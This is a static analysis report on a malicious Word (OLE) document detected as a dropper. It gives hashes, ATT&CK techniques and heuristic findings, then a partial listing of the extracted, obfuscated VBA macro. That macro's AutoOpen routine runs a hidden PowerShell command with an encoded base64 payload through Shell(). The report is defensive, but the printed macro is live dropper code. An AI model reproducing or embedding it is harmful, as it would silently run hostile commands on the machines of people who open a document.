Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 eb910be2272948d9…

MALICIOUS

Office (OLE)

119.2 KB Created: 2018-05-25 09:33:00 Authoring application: Microsoft Office Word First seen: 2019-05-16
MD5: 86d751896efdbe034c9c816638196d43 SHA-1: b4c80043537e33997aa94e9267c54449535c7910 SHA-256: eb910be2272948d91c32587a785bfa7ca5b9d3ed84a97c67f690854dbb1787c8
242 Risk Score

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic T1204.002 Malicious File T1566.001 Spearphishing Attachment

The file contains a VBA macro with an AutoOpen function, which is a common technique for executing malicious code upon opening a document. The macro utilizes a Shell() call, indicating an attempt to execute an external command. This strongly suggests the file is a dropper designed to download and execute a second-stage payload, aligning with the ClamAV detection of 'Doc.Dropper.Agent-6556942-0'.

Heuristics 7

  • ClamAV: Doc.Dropper.Agent-6557108-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-6557108-0
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • Shell() call in VBA critical OLE_VBA_SHELL
    Shell() call in VBA
  • AutoOpen macro high OLE_VBA_AUTOOPEN
    AutoOpen macro
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

FilenameKindSourceSize
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 27143 bytes
SHA-256: 6361cc8fb4c90a85484b019dafa3ab01f62192da65ba296896499316fe89d76c
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "BFURziWmal"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Function dQllvDA()
On Error Resume Next
Set dlVBu = jbFdo
nwOTs = whusdZ + CSng(53803) + 49640 / Sin(86731 - CByte(69900) / 87185 - Round(20371)) + FEVCUN * dCiLY - (60825 + 22804 + 12098 - 3265)
Set QkKOkz = lHvZUY
ivtjwS = uFhSvw + CSng(66300) + 38923 / Sin(96145 - CByte(26422) / 41712 - Round(46381)) + TIAUVE * RMRmJd - (69042 + 56487 + 55708 - 72761)
dQllvDA = FWcHkww + pGjLuUQMKQs + YcJGpQ + plRlw + aNVRQUnU + opMliuKUGz + ShVzqiCOF + zGkGiqz + ViaCzZkS + JXdFzhB + UZmfbAzszl + LBqzibi + wCRAq + CIClqBHjN
Set HjBWid = oBwRJh
wbfZu = Nubdi + CSng(77289) + 89300 / Sin(18171 - CByte(34582) / 28459 - Round(9820)) + MkOovz * XZjCuz - (4893 + 69162 + 67534 - 24086)
End Function
Sub Autoopen()
On Error Resume Next
Set EDiMO = HXoqi
Wmrazw = HjhvXz + CSng(63991) + 84018 / Sin(63756 - CByte(57656) / 60669 - Round(8134)) + wPJBJ * WBhXJn - (77800 + 74667 + 19571 - 31979)
QsMpzXvcbz (dQllvDA)
Set ZEntE = XHKNh
atImX = GcpRwa + CSng(76450) + 49982 / Sin(17620 - CByte(45724) / 16718 - Round(67509)) + XbdEa * Rrumt - (96962 + 72855 + 78110 - 62319)
End Sub
Function QsMpzXvcbz(qZbTUw)
On Error Resume Next
Set iBARz = oOIGM
iMzwb = Kuwph + CSng(41088) + 11530 / Sin(95086 - CByte(23993) / 80520 - Round(91299)) + MlHSf * HSPTm - (29744 + 91148 + 39096 - 8442)
Set MhmvW = imKoTf
zqwSq = awMhdr + CSng(18210) + 71117 / Sin(82286 - CByte(13793) / 63841 - Round(88394)) + QukiC * vbHUH - (81737 + 6255 + 54353 - 13543)
QPVsZ = Shell(lijRb + Chr(vbKeyP) + pmpoSMNZn + qZbTUw, vbHide)
Set cowFa = MAAJEN
nfduF = QPMvS + CSng(89207) + 35722 / Sin(36263 - CByte(57364) / 8379 - Round(82121)) + OCVOS * omnijd - (86798 + 92948 + 66038 - 51329)
End Function


Attribute VB_Name = "pivzNqzQti"
Function FWcHkww()
On Error Resume Next
Set HuEfC = WIHiP
qstboV = ZhlQv + CSng(9143) + 93617 / Sin(99420 - CByte(20297) / 13775 - Round(18277)) + cbEqPM * QoQDsF - (2450 + 10898 + 48576 - 57406)
fHPhPBwGw = "owersH" + "eLL -WinDo" + "wsTyle h" + "idden -e" + " JgAoACAAJAB" + "QAFMAaABv"
Set fvXvv = ViJaG
LBwmn = lCdOB + CSng(10508) + 26945 / Sin(17656 - CByte(57837) / 87615 - Round(21047)) + zXVKbO * jjmUl - (7153 + 24110 + 19421 - 59543)
UWNLLdCWQWq = "AG0ARQBbADQAXQA" + "rACQAcABzAGgA" + "bwBNAEU" + "AWwAzAD" + "QAXQArA" + "CcAWAAnAC"
Set CtTNk = bWQuSh
ocTObi = BZkNGo + CSng(98499) + 64225 / Sin(84336 - CByte(20599) / 77931 - Round(91087)) + EbzrjO * unLUGz - (90174 + 96676 + 85781 - 35463)
jMtUQI = "kAIAAoACAAKAAo" + "ACgAIgB" + "7ADIAM" + "gB9AHsAMQAzAD" + "YAfQB" + "7ADgAMwB9AHsAMQ" + "AxADIAfQB7AD"
Set kbrDdJ = Hwoui
FXwhM = biNwtN + CSng(27532) + 30239 / Sin(13897 - CByte(13668) / 87120 - Round(1830)) + ZVDTrB * qmYRvz - (16767 + 9612 + 28491 - 67724)
bGQvwvNw = "EANAA2A" + "H0AewA" + "xADIANAB" + "9AHsAMQAyADEA" + "fQB7ADEAMgA3AH" + "0AewAxADYAN" + "AB9AHsAMQ" + "A1ADkAfQB7A" + "DkAOAB"
Set NlQrF = czpOt
ADnFFk = DGfNl + CSng(79040) + 19421 / Sin(91563 - CByte(6839) / 87688 - Round(9476)) + AYGfP * iQjru - (22785 + 69010 + 93523 - 76655)
HkXnlENT = "9AHsAMQAzADkA" + "fQB7AD" + "EAMwA4AH0AewA" + "yADMAfQB7"
Set OHuDU = juiXi
vbYEk = sauXY + CSng(63498) + 44491 / Sin(38544 - CByte(40977) / 22527 - Round(23513)) + ipBlh * zBonrL - (95223 + 83199 + 88224 - 62187)
pYGSmMc = "ADcAMwB9AHsAM" + "QA1AD" + "AAfQB7ADEAMQ" + "AxAH0A" + "ewA5ADMAfQB7" + "ADEANgA1AH0Aew"
Set ESqbi = NiqjN
ArUiOt = AKudEj + CSng(32613) + 9713 / Sin(66330 - CByte(66728) / 50312 - Round(63576)) + qzQtVs * lnHqMl - (41434 + 76157 + 92498 - 45167)
pAmFvh = "AxADYANwB9AHs" + "AMQA0ADgAfQB" + "7ADEAMwB9" + "AHsANAAyAH"
Set jzEfKK = lsNwiv
CapBb = MVuDMC + CSng(8741) + 32932 / Sin(37260 - CByte(25911) / 56456 - Round(17214)) + FqjiL * GEkAlm - (16880 + 23910 + 48835 - 18650)
XoGmB = "0AewA3AH0Aew" + "A2ADgAfQB7ADEA" + "MgA2AH0Ae" + "wA2ADMAfQ"
FWcHkww = fHPhP
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.